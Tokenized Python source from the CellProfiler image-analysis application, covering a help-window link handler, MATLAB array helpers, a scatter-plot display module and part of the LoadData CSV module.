<NUM_LIT:0.> ) : <EOL> """<STR_LIT>""" <EOL> def wrap ( f ) : <EOL> @ wraps ( f ) <EOL> def delayed ( * args , ** kwargs ) : <EOL> timer = threading . Timer ( delay , f , args = args , kwargs = kwargs ) <EOL> timer . start ( ) <EOL> return delayed <EOL> return wrap </s>
<s> from cellprofiler . preferences import get_background_color , set_startup_blurb <EOL> import cellprofiler . gui . html . content <EOL> import cellprofiler . icons <EOL> import content <EOL> import os <EOL> import sys <EOL> import urllib <EOL> import urllib2 <EOL> import webbrowser <EOL> import wx <EOL> import wx . html <EOL> MEMORY_SCHEME = "<STR_LIT>" <EOL> WELCOME_SCREEN_FRAME = "<STR_LIT>" <EOL> class HtmlClickableWindow ( wx . html . HtmlWindow ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> wx . html . HtmlWindow . __init__ ( self , * args , ** kwargs ) <EOL> def load_startup_blurb ( self ) : <EOL> self . OnLinkClicked ( wx . html . HtmlLinkInfo ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def OnLinkClicked ( self , linkinfo ) : <EOL> href = linkinfo . Href <EOL> if href . startswith ( "<STR_LIT:#>" ) : <EOL> super ( HtmlClickableWindow , self ) . OnLinkClicked ( linkinfo ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> webbrowser . open ( href ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' in href : <EOL> set_startup_blurb ( False ) <EOL> parent = self . Parent <EOL> while parent is not None : <EOL> if parent . Name == WELCOME_SCREEN_FRAME : <EOL> parent . Close ( ) <EOL> break <EOL> parent = parent . Parent <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> href = linkinfo . Href [ <NUM_LIT:7> : ] <EOL> html_str = cellprofiler . gui . html . content . WELCOME_HELP [ href ] <EOL> html_str += '<STR_LIT>' <EOL> self . SetPage ( html_str ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> pipeline_filename = href [ <NUM_LIT:5> : ] <EOL> try : <EOL> fd = urllib2 . urlopen ( pipeline_filename ) <EOL> if fd . code < <NUM_LIT:200> or fd . code > <NUM_LIT> : <EOL> wx . MessageBox ( <EOL> "<STR_LIT>" % <EOL> pipeline_filename , <EOL> caption = "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_INFORMATION ) <EOL> return <EOL> wx . CallAfter ( wx . GetApp ( ) . frame . pipeline . load , fd ) <EOL> except : <EOL> wx . 
MessageBox ( <EOL> '<STR_LIT>' % <EOL> pipeline_filename , "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_ERROR ) <EOL> elif href . startswith ( '<STR_LIT>' ) : <EOL> pipeline_filename = href [ <NUM_LIT:12> : ] <EOL> try : <EOL> import cellprofiler . modules . loaddata <EOL> fd = urllib . urlopen ( pipeline_filename ) <EOL> if fd . code < <NUM_LIT:200> or fd . code > <NUM_LIT> : <EOL> wx . MessageBox ( <EOL> "<STR_LIT>" % <EOL> pipeline_filename , <EOL> caption = "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_INFORMATION ) <EOL> return <EOL> def fn ( fd = fd ) : <EOL> pipeline = wx . GetApp ( ) . frame . pipeline <EOL> pipeline . load ( fd ) <EOL> for module in pipeline . modules ( ) : <EOL> if isinstance ( module , cellprofiler . modules . loaddata . LoadData ) : <EOL> global header_cache <EOL> header_cache = { } <EOL> try : <EOL> module . open_csv ( ) <EOL> except : <EOL> pass <EOL> wx . MessageBox ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , wx . ICON_INFORMATION ) <EOL> wx . CallAfter ( fn ) <EOL> except : <EOL> wx . MessageBox ( <EOL> '<STR_LIT>' % <EOL> pipeline_filename , "<STR_LIT>" , <EOL> style = wx . OK | wx . ICON_ERROR ) <EOL> else : <EOL> newpage = content . find_link ( href ) <EOL> if newpage is not None : <EOL> self . SetPage ( newpage ) <EOL> else : <EOL> super ( HtmlClickableWindow , self ) . OnLinkClicked ( linkinfo ) <EOL> def OnOpeningURL ( self , file_format , url ) : <EOL> if file_format == wx . html . HTML_URL_IMAGE : <EOL> if url . startswith ( MEMORY_SCHEME ) : <EOL> path = cellprofiler . icons . get_builtin_images_path ( ) <EOL> full_path = os . path . join ( path , url [ len ( MEMORY_SCHEME ) : ] ) <EOL> if sys . platform . startswith ( "<STR_LIT>" ) : <EOL> my_url = full_path <EOL> else : <EOL> my_url = "<STR_LIT>" + urllib . pathname2url ( full_path ) <EOL> return my_url <EOL> return wx . html . HTML_OPEN </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> import numpy <EOL> import scipy . io . matlab . mio <EOL> def new_string_cell_array ( shape ) : <EOL> """<STR_LIT>""" <EOL> result = numpy . ndarray ( shape , dtype = numpy . dtype ( '<STR_LIT:object>' ) ) <EOL> for i in range ( <NUM_LIT:0> , shape [ <NUM_LIT:0> ] ) : <EOL> for j in range ( <NUM_LIT:0> , shape [ <NUM_LIT:1> ] ) : <EOL> result [ i , j ] = numpy . empty ( ( <NUM_LIT:0> , <NUM_LIT:0> ) ) <EOL> return result <EOL> def make_cell_struct_dtype ( fields ) : <EOL> """<STR_LIT>""" <EOL> return numpy . dtype ( [ ( str ( x ) , '<STR_LIT>' ) for x in fields ] ) <EOL> def encapsulate_strings_in_arrays ( handles ) : <EOL> """<STR_LIT>""" <EOL> if handles . dtype . kind == '<STR_LIT:O>' : <EOL> flat = handles . flat <EOL> for i in range ( <NUM_LIT:0> , len ( flat ) ) : <EOL> if isinstance ( flat [ i ] , str ) or isinstance ( flat [ i ] , unicode ) : <EOL> flat [ i ] = encapsulate_string ( flat [ i ] ) <EOL> elif isinstance ( flat [ i ] , numpy . ndarray ) : <EOL> encapsulate_strings_in_arrays ( flat [ i ] ) <EOL> elif handles . dtype . fields : <EOL> for field in handles . dtype . fields . keys ( ) : <EOL> if isinstance ( handles [ field ] , str ) or isinstance ( handles [ field ] , unicode ) : <EOL> handles [ field ] = encapsulate_string ( handles [ field ] ) <EOL> elif isinstance ( handles [ field ] , numpy . ndarray ) : <EOL> encapsulate_strings_in_arrays ( handles [ field ] ) <EOL> def encapsulate_string ( s ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( s , str ) : <EOL> result = numpy . ndarray ( ( <NUM_LIT:1> , ) , '<STR_LIT>' % ( len ( s ) ) ) <EOL> else : <EOL> result = numpy . ndarray ( ( <NUM_LIT:1> , ) , '<STR_LIT>' % ( len ( s ) ) ) <EOL> result [ <NUM_LIT:0> ] = s <EOL> return result </s>
<s> '''<STR_LIT>''' <EOL> import numpy as np <EOL> import cellprofiler . cpimage as cpi <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> SOURCE_IM = cpmeas . IMAGE <EOL> SOURCE_OBJ = "<STR_LIT>" <EOL> SOURCE_CHOICE = [ SOURCE_IM , SOURCE_OBJ ] <EOL> SCALE_CHOICE = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class DisplayScatterPlot ( cpm . CPModule ) : <EOL> module_name = "<STR_LIT>" <EOL> category = "<STR_LIT>" <EOL> variable_revision_number = <NUM_LIT:2> <EOL> def create_settings ( self ) : <EOL> self . x_source = cps . Choice ( <EOL> "<STR_LIT>" , SOURCE_CHOICE , doc = '''<STR_LIT>''' % globals ( ) ) <EOL> self . x_object = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . x_axis = cps . Measurement ( <EOL> '<STR_LIT>' , <EOL> self . get_x_object , cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . y_source = cps . Choice ( "<STR_LIT>" , SOURCE_CHOICE , doc = '''<STR_LIT>''' % globals ( ) ) <EOL> self . y_object = cps . ObjectNameSubscriber ( <EOL> '<STR_LIT>' , <EOL> cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . y_axis = cps . Measurement ( <EOL> '<STR_LIT>' , <EOL> self . get_y_object , cps . NONE , doc = '''<STR_LIT>''' ) <EOL> self . xscale = cps . Choice ( <EOL> '<STR_LIT>' , SCALE_CHOICE , None , doc = '''<STR_LIT>''' ) <EOL> self . yscale = cps . Choice ( <EOL> '<STR_LIT>' , SCALE_CHOICE , None , doc = '''<STR_LIT>''' ) <EOL> self . title = cps . Text ( <EOL> '<STR_LIT>' , '<STR_LIT>' , doc = '''<STR_LIT>''' ) <EOL> def get_x_object ( self ) : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> return cpmeas . IMAGE <EOL> return self . x_object . value <EOL> def get_y_object ( self ) : <EOL> if self . y_source . value == cpmeas . IMAGE : <EOL> return cpmeas . IMAGE <EOL> return self . x_object . value <EOL> def settings ( self ) : <EOL> result = [ self . x_source , self . x_object , self . 
x_axis ] <EOL> result += [ self . y_source , self . y_object , self . y_axis ] <EOL> result += [ self . xscale , self . yscale , self . title ] <EOL> return result <EOL> def visible_settings ( self ) : <EOL> result = [ self . x_source ] <EOL> if self . x_source . value != cpmeas . IMAGE : <EOL> result += [ self . x_object , self . x_axis ] <EOL> else : <EOL> result += [ self . x_axis ] <EOL> result += [ self . y_source ] <EOL> if self . y_source . value != cpmeas . IMAGE : <EOL> result += [ self . y_object , self . y_axis ] <EOL> else : <EOL> result += [ self . y_axis ] <EOL> result += [ self . xscale , self . yscale , self . title ] <EOL> return result <EOL> def run ( self , workspace ) : <EOL> m = workspace . get_measurements ( ) <EOL> if self . x_source . value == self . y_source . value : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> xvals = m . get_all_measurements ( cpmeas . IMAGE , self . x_axis . value ) <EOL> yvals = m . get_all_measurements ( cpmeas . IMAGE , self . y_axis . value ) <EOL> xvals , yvals = np . array ( [ <EOL> ( x if np . isscalar ( x ) else x [ <NUM_LIT:0> ] , y if np . isscalar ( y ) else y [ <NUM_LIT:0> ] ) <EOL> for x , y in zip ( xvals , yvals ) <EOL> if ( x is not None ) and ( y is not None ) ] ) . transpose ( ) <EOL> title = '<STR_LIT:%s>' % self . title . value <EOL> else : <EOL> xvals = m . get_current_measurement ( self . get_x_object ( ) , self . x_axis . value ) <EOL> yvals = m . get_current_measurement ( self . get_y_object ( ) , self . y_axis . value ) <EOL> title = '<STR_LIT>' % ( self . title . value , workspace . measurements . image_set_number ) <EOL> else : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> xvals = m . get_all_measurements ( cpmeas . IMAGE , self . x_axis . value ) <EOL> yvals = m . get_current_measurement ( self . get_y_object ( ) , self . y_axis . value ) <EOL> xvals = np . array ( [ xvals [ <NUM_LIT:0> ] ] * len ( yvals ) ) <EOL> else : <EOL> xvals = m . 
get_current_measurement ( self . get_x_object ( ) , self . x_axis . value ) <EOL> yvals = m . get_all_measurements ( cpmeas . IMAGE , self . y_axis . value ) <EOL> yvals = np . array ( [ yvals [ <NUM_LIT:0> ] ] * len ( xvals ) ) <EOL> xvals , yvals = np . array ( [ <EOL> ( x if np . isscalar ( x ) else x [ <NUM_LIT:0> ] , y if np . isscalar ( y ) else y [ <NUM_LIT:0> ] ) <EOL> for x , y in zip ( xvals , yvals ) <EOL> if ( x is not None ) and ( y is not None ) ] ) . transpose ( ) <EOL> if self . show_window : <EOL> workspace . display_data . xvals = xvals <EOL> workspace . display_data . yvals = yvals <EOL> def display ( self , workspace , figure ) : <EOL> xvals = workspace . display_data . xvals <EOL> yvals = workspace . display_data . yvals <EOL> title = '<STR_LIT:%s>' % self . title . value <EOL> figure . set_subplots ( ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> figure . subplot_scatter ( <NUM_LIT:0> , <NUM_LIT:0> , xvals , yvals , <EOL> xlabel = self . x_axis . value , <EOL> ylabel = self . y_axis . value , <EOL> xscale = self . xscale . value , <EOL> yscale = self . yscale . value , <EOL> title = title ) <EOL> def run_as_data_tool ( self , workspace ) : <EOL> self . run ( workspace ) <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , <EOL> module_name , from_matlab ) : <EOL> """<STR_LIT>""" <EOL> if not from_matlab and variable_revision_number == <NUM_LIT:1> : <EOL> if setting_values [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> new_setting_values = [ setting_values [ <NUM_LIT:0> ] , cps . NONE , setting_values [ <NUM_LIT:1> ] , cpmeas . IMAGE , <EOL> cps . NONE ] + setting_values [ <NUM_LIT:2> : ] <EOL> else : <EOL> new_setting_values = setting_values [ : <NUM_LIT:3> ] + [ SOURCE_OBJ ] + setting_values [ <NUM_LIT:3> : ] <EOL> setting_values = new_setting_values <EOL> variable_revision_number = <NUM_LIT:2> <EOL> return setting_values , variable_revision_number , from_matlab </s>
<s> '''<STR_LIT>''' <EOL> import csv <EOL> import hashlib <EOL> import logging <EOL> import os <EOL> import sys <EOL> import numpy as np <EOL> logger = logging . getLogger ( __name__ ) <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> import matplotlib . mlab <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . objects as cpo <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> from cellprofiler . settings import YES , NO <EOL> import cellprofiler . preferences as cpprefs <EOL> import identify as I <EOL> from cellprofiler . modules . loadimages import LoadImagesImageProvider <EOL> from cellprofiler . modules . loadimages import C_FILE_NAME , C_PATH_NAME , C_URL <EOL> from cellprofiler . modules . loadimages import C_SERIES , C_FRAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_FILE_NAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_PATH_NAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_URL <EOL> from cellprofiler . measurements import C_OBJECTS_SERIES , C_OBJECTS_FRAME <EOL> from cellprofiler . modules . loadimages import C_MD5_DIGEST , C_SCALING <EOL> from cellprofiler . modules . loadimages import C_HEIGHT , C_WIDTH <EOL> from cellprofiler . modules . loadimages import bad_sizes_warning <EOL> from cellprofiler . modules . loadimages import convert_image_to_objects <EOL> from cellprofiler . modules . loadimages import pathname2url , url2pathname <EOL> from cellprofiler . 
preferences import standardize_default_folder_names , DEFAULT_INPUT_FOLDER_NAME , DEFAULT_OUTPUT_FOLDER_NAME , NO_FOLDER_NAME , ABSOLUTE_FOLDER_NAME , IO_FOLDER_CHOICE_HELP_TEXT <EOL> IMAGE_CATEGORIES = ( C_URL , C_FILE_NAME , C_PATH_NAME ) <EOL> OBJECTS_CATEGORIES = ( C_OBJECTS_URL , C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME ) <EOL> DIR_NONE = '<STR_LIT:None>' <EOL> DIR_OTHER = '<STR_LIT>' <EOL> DIR_ALL = [ DEFAULT_INPUT_FOLDER_NAME , DEFAULT_OUTPUT_FOLDER_NAME , <EOL> NO_FOLDER_NAME , ABSOLUTE_FOLDER_NAME ] <EOL> '''<STR_LIT>''' <EOL> PATH_PADDING = <NUM_LIT:20> <EOL> '''<STR_LIT>''' <EOL> header_cache = { } <EOL> def header_to_column ( field ) : <EOL> '''<STR_LIT>''' <EOL> for name in ( C_PATH_NAME , C_FILE_NAME , C_URL , <EOL> C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME , C_OBJECTS_URL ) : <EOL> if field . startswith ( cpmeas . IMAGE + '<STR_LIT:_>' + name + '<STR_LIT:_>' ) : <EOL> return field [ len ( cpmeas . IMAGE ) + <NUM_LIT:1> : ] <EOL> return field <EOL> def is_path_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_PATH_NAME + '<STR_LIT:_>' ) <EOL> def is_file_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_FILE_NAME + '<STR_LIT:_>' ) <EOL> def is_url_name_feature ( feature ) : <EOL> return feature . startswith ( C_URL + "<STR_LIT:_>" ) <EOL> def is_objects_path_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_OBJECTS_PATH_NAME + "<STR_LIT:_>" ) <EOL> def is_objects_file_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_OBJECTS_FILE_NAME + "<STR_LIT:_>" ) <EOL> def is_objects_url_name_feature ( feature ) : <EOL> return feature . 
startswith ( C_OBJECTS_URL + "<STR_LIT:_>" ) <EOL> def get_image_name ( feature ) : <EOL> '''<STR_LIT>''' <EOL> if is_path_name_feature ( feature ) : <EOL> return feature [ len ( C_PATH_NAME + '<STR_LIT:_>' ) : ] <EOL> if is_file_name_feature ( feature ) : <EOL> return feature [ len ( C_FILE_NAME + '<STR_LIT:_>' ) : ] <EOL> if is_url_name_feature ( feature ) : <EOL> return feature [ len ( C_URL + '<STR_LIT:_>' ) : ] <EOL> raise ValueError ( '<STR_LIT>' % feature ) <EOL> def get_objects_name ( feature ) : <EOL> '''<STR_LIT>''' <EOL> if is_objects_path_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_PATH_NAME + "<STR_LIT:_>" ) : ] <EOL> if is_objects_file_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_FILE_NAME + "<STR_LIT:_>" ) : ] <EOL> if is_objects_url_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_URL + "<STR_LIT:_>" ) : ] <EOL> raise ValueError ( '<STR_LIT>' % feature ) <EOL> def make_path_name_feature ( image ) : <EOL> '''<STR_LIT>''' <EOL> return C_PATH_NAME + '<STR_LIT:_>' + image <EOL> def make_file_name_feature ( image ) : <EOL> '''<STR_LIT>''' <EOL> return C_FILE_NAME + '<STR_LIT:_>' + image <EOL> def make_objects_path_name_feature ( objects_name ) : <EOL> '''<STR_LIT>''' <EOL> return C_OBJECTS_PATH_NAME + '<STR_LIT:_>' + objects_name <EOL> def make_objects_file_name_feature ( objects_name ) : <EOL> '''<STR_LIT>''' <EOL> return C_OBJECTS_FILE_NAME + '<STR_LIT:_>' + objects_name <EOL> class LoadData ( cpm . CPModule ) : <EOL> module_name = "<STR_LIT>" <EOL> category = '<STR_LIT>' <EOL> variable_revision_number = <NUM_LIT:6> <EOL> def create_settings ( self ) : <EOL> self . csv_directory = cps . DirectoryPath ( <EOL> "<STR_LIT>" , allow_metadata = False , support_urls = True , <EOL> doc = """<STR_LIT>""" % globals ( ) ) <EOL> def get_directory_fn ( ) : <EOL> '''<STR_LIT>''' <EOL> return self . csv_directory . 
get_absolute_path ( ) <EOL> def set_directory_fn ( path ) : <EOL> dir_choice , custom_path = self . csv_directory . get_parts_from_path ( path ) <EOL> self . csv_directory . join_parts ( dir_choice , custom_path ) <EOL> self . csv_file_name = cps . FilenameText ( <EOL> "<STR_LIT>" , <EOL> cps . NONE , doc = """<STR_LIT>""" , <EOL> get_directory_fn = get_directory_fn , <EOL> set_directory_fn = set_directory_fn , <EOL> browse_msg = "<STR_LIT>" , <EOL> exts = [ ( "<STR_LIT>" , "<STR_LIT>" ) , ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> ) <EOL> self . browse_csv_button = cps . DoSomething ( <EOL> "<STR_LIT>" , "<STR_LIT>" , self . browse_csv ) <EOL> self . wants_images = cps . Binary ( "<STR_LIT>" , True , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . rescale = cps . Binary ( <EOL> "<STR_LIT>" , True , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . image_directory = cps . DirectoryPath ( <EOL> "<STR_LIT>" , <EOL> dir_choices = DIR_ALL , allow_metadata = False , doc = """<STR_LIT>""" ) <EOL> self . wants_image_groupings = cps . Binary ( <EOL> "<STR_LIT>" , False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . metadata_fields = cps . MultiChoice ( <EOL> "<STR_LIT>" , None , doc = """<STR_LIT>""" ) <EOL> self . wants_rows = cps . Binary ( <EOL> "<STR_LIT>" , <EOL> False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . row_range = cps . IntegerRange ( <EOL> "<STR_LIT>" , <EOL> ( <NUM_LIT:1> , <NUM_LIT> ) , <NUM_LIT:1> , doc = """<STR_LIT>""" ) <EOL> def do_reload ( ) : <EOL> global header_cache <EOL> header_cache = { } <EOL> try : <EOL> self . open_csv ( ) <EOL> except : <EOL> pass <EOL> self . clear_cache_button = cps . DoSomething ( <EOL> "<STR_LIT>" , "<STR_LIT>" , do_reload , doc = """<STR_LIT>""" ) <EOL> def settings ( self ) : <EOL> return [ self . csv_directory , <EOL> self . csv_file_name , self . wants_images , self . image_directory , <EOL> self . wants_rows , <EOL> self . row_range , self . wants_image_groupings , <EOL> self . 
metadata_fields , self . rescale ] <EOL> def validate_module ( self , pipeline ) : <EOL> csv_path = self . csv_path <EOL> if self . csv_directory . dir_choice != cps . URL_FOLDER_NAME : <EOL> if not os . path . isfile ( csv_path ) : <EOL> raise cps . ValidationError ( "<STR_LIT>" % csv_path , <EOL> self . csv_file_name ) <EOL> try : <EOL> self . open_csv ( ) <EOL> except IOError , e : <EOL> import errno <EOL> if e . errno == errno . EWOULDBLOCK : <EOL> raise cps . ValidationError ( "<STR_LIT>" % <EOL> self . csv_path , self . csv_file_name ) <EOL> else : <EOL> raise cps . ValidationError ( "<STR_LIT>" % <EOL> ( self . csv_path , e ) , self . csv_file_name ) <EOL> try : <EOL> self . get_header ( ) <EOL> except Exception , e : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> ( self . csv_path , e ) , self . csv_file_name ) <EOL> def validate_module_warnings ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> from cellprofiler . modules . loadimages import LoadImages <EOL> for module in pipeline . modules ( ) : <EOL> if id ( module ) == id ( self ) : <EOL> return <EOL> if isinstance ( module , LoadData ) : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . csv_file_name ) <EOL> if isinstance ( module , LoadImages ) : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . csv_file_name ) <EOL> if self . wants_image_groupings . value and ( len ( self . metadata_fields . selections ) == <NUM_LIT:0> ) : <EOL> raise cps . ValidationError ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> self . metadata_fields ) <EOL> def visible_settings ( self ) : <EOL> result = [ self . csv_directory , self . csv_file_name , <EOL> self . browse_csv_button ] <EOL> if self . csv_directory . dir_choice == cps . URL_FOLDER_NAME : <EOL> result += [ self . clear_cache_button ] <EOL> self . 
csv_file_name . text = "<STR_LIT>" <EOL> self . csv_file_name . set_browsable ( False ) <EOL> else : <EOL> self . csv_file_name . text = "<STR_LIT>" <EOL> self . csv_file_name . set_browsable ( True ) <EOL> result += [ self . wants_images ] <EOL> if self . wants_images . value : <EOL> result += [ self . rescale , self . image_directory , <EOL> self . wants_image_groupings ] <EOL> if self . wants_image_groupings . value : <EOL> result += [ self . metadata_fields ] <EOL> try : <EOL> fields = [ field [ len ( "<STR_LIT>" ) : ] <EOL> for field in self . get_header ( ) <EOL> if field . startswith ( "<STR_LIT>" ) ] <EOL> if self . has_synthetic_well_metadata ( ) : <EOL> fields += [ cpmeas . FTR_WELL ] <EOL> self . metadata_fields . choices = fields <EOL> except : <EOL> self . metadata_fields . choices = [ "<STR_LIT>" ] <EOL> result += [ self . wants_rows ] <EOL> if self . wants_rows . value : <EOL> result += [ self . row_range ] <EOL> return result <EOL> def convert ( self ) : <EOL> data = matplotlib . mlab . csv2rec ( self . csv_path ) <EOL> src_dsc = data [ '<STR_LIT>' ] <EOL> def uniquewaves ( seq ) : <EOL> output = [ ] <EOL> for x in seq : <EOL> if x not in output : <EOL> output . append ( x ) <EOL> return output <EOL> waves = uniquewaves ( src_dsc ) <EOL> pathname = [ ] <EOL> filename = [ ] <EOL> wave_pnames = [ ] <EOL> wave_fnames = [ ] <EOL> for i in range ( len ( waves ) ) : <EOL> mask = data [ '<STR_LIT>' ] == waves [ i ] <EOL> pathname . append ( data [ mask ] [ '<STR_LIT>' ] ) <EOL> filename . append ( data [ mask ] [ '<STR_LIT>' ] ) <EOL> wave_pnames . append ( '<STR_LIT>' % ( waves [ i ] . strip ( '<STR_LIT:">' ) ) ) <EOL> wave_fnames . append ( '<STR_LIT>' % ( waves [ i ] . 
strip ( '<STR_LIT:">' ) ) ) <EOL> for i in range ( len ( waves ) ) : <EOL> if len ( filename [ i ] ) != len ( filename [ <NUM_LIT:0> ] ) : <EOL> raise RuntimeError ( "<STR_LIT>" % <EOL> ( wave_fnames [ i ] , len ( filename [ i ] ) , wave_fnames [ <NUM_LIT:0> ] , len ( filename [ <NUM_LIT:0> ] ) ) ) <EOL> def metadatacols ( header ) : <EOL> output = [ ] <EOL> for h in header : <EOL> if not h . startswith ( '<STR_LIT>' ) : <EOL> if isinstance ( h , unicode ) : <EOL> output . append ( h . encode ( "<STR_LIT:utf-8>" ) ) <EOL> else : <EOL> output . append ( h ) <EOL> return output <EOL> def data_for_one_wave ( data ) : <EOL> mask = data [ '<STR_LIT>' ] == waves [ <NUM_LIT:0> ] <EOL> data_onewave = data [ mask ] <EOL> return data_onewave <EOL> header = data . dtype . names <EOL> metadata_names = metadatacols ( header ) <EOL> data_onewave = data_for_one_wave ( data ) <EOL> strdate = [ ] <EOL> for date in data_onewave [ '<STR_LIT>' ] : <EOL> strdate += [ str ( date ) ] <EOL> metadata_names . remove ( '<STR_LIT>' ) <EOL> metadata_names . remove ( '<STR_LIT>' ) <EOL> data_onewave_nofilepaths = matplotlib . mlab . rec_keep_fields ( data_onewave , metadata_names ) <EOL> metadata_names = [ '<STR_LIT>' + m for m in metadata_names ] <EOL> data_onewave_nofilepaths . dtype . names = metadata_names <EOL> final_data = data_onewave_nofilepaths <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , '<STR_LIT>' , strdate ) <EOL> for i in range ( len ( waves ) ) : <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , wave_pnames [ i ] , pathname [ i ] ) <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , wave_fnames [ i ] , filename [ i ] ) <EOL> return final_data <EOL> @ property <EOL> def csv_path ( self ) : <EOL> '''<STR_LIT>''' <EOL> if cpprefs . get_data_file ( ) is not None : <EOL> return cpprefs . get_data_file ( ) <EOL> if self . csv_directory . dir_choice == cps . URL_FOLDER_NAME : <EOL> return self . csv_file_name . 
value <EOL> path = self . csv_directory . get_absolute_path ( ) <EOL> return os . path . join ( path , self . csv_file_name . value ) <EOL> @ property <EOL> def image_path ( self ) : <EOL> return self . image_directory . get_absolute_path ( ) <EOL> @ property <EOL> def legacy_field_key ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' % self . module_num <EOL> def get_cache_info ( self ) : <EOL> '''<STR_LIT>''' <EOL> global header_cache <EOL> entry = header_cache . get ( self . csv_path , dict ( ctime = <NUM_LIT:0> ) ) <EOL> if cpprefs . is_url_path ( self . csv_path ) : <EOL> if not header_cache . has_key ( self . csv_path ) : <EOL> header_cache [ self . csv_path ] = entry <EOL> return entry <EOL> ctime = os . stat ( self . csv_path ) . st_ctime <EOL> if ctime > entry [ "<STR_LIT>" ] : <EOL> entry = header_cache [ self . csv_path ] = { } <EOL> entry [ "<STR_LIT>" ] = ctime <EOL> return entry <EOL> def open_csv ( self , do_not_cache = False ) : <EOL> '''<STR_LIT>''' <EOL> global header_cache <EOL> if cpprefs . is_url_path ( self . csv_path ) : <EOL> if not header_cache . has_key ( self . csv_path ) : <EOL> header_cache [ self . csv_path ] = { } <EOL> entry = header_cache [ self . csv_path ] <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> raise entry [ "<STR_LIT>" ] <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> fd = StringIO ( entry [ "<STR_LIT>" ] ) <EOL> else : <EOL> if do_not_cache : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> import urllib2 <EOL> try : <EOL> url_fd = urllib2 . urlopen ( self . csv_path ) <EOL> except Exception , e : <EOL> entry [ "<STR_LIT>" ] = e <EOL> raise e <EOL> fd = StringIO ( ) <EOL> while True : <EOL> text = url_fd . read ( ) <EOL> if len ( text ) == <NUM_LIT:0> : <EOL> break <EOL> fd . write ( text ) <EOL> fd . seek ( <NUM_LIT:0> ) <EOL> entry [ "<STR_LIT>" ] = fd . getvalue ( ) <EOL> return fd <EOL> else : <EOL> return open ( self . 
csv_path , '<STR_LIT:rb>' ) <EOL> def browse_csv ( self ) : <EOL> import wx <EOL> from cellprofiler . gui import get_cp_icon <EOL> try : <EOL> fd = self . open_csv ( ) <EOL> except : <EOL> wx . MessageBox ( "<STR_LIT>" % self . csv_path ) <EOL> return <EOL> reader = csv . reader ( fd ) <EOL> header = reader . next ( ) <EOL> frame = wx . Frame ( wx . GetApp ( ) . frame , title = self . csv_path ) <EOL> sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> frame . SetSizer ( sizer ) <EOL> list_ctl = wx . ListCtrl ( frame , style = wx . LC_REPORT ) <EOL> sizer . Add ( list_ctl , <NUM_LIT:1> , wx . EXPAND ) <EOL> for i , field in enumerate ( header ) : <EOL> list_ctl . InsertColumn ( i , field ) <EOL> for line in reader : <EOL> list_ctl . Append ( [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in line [ : len ( header ) ] ] ) <EOL> frame . SetMinSize ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> frame . SetIcon ( get_cp_icon ( ) ) <EOL> frame . 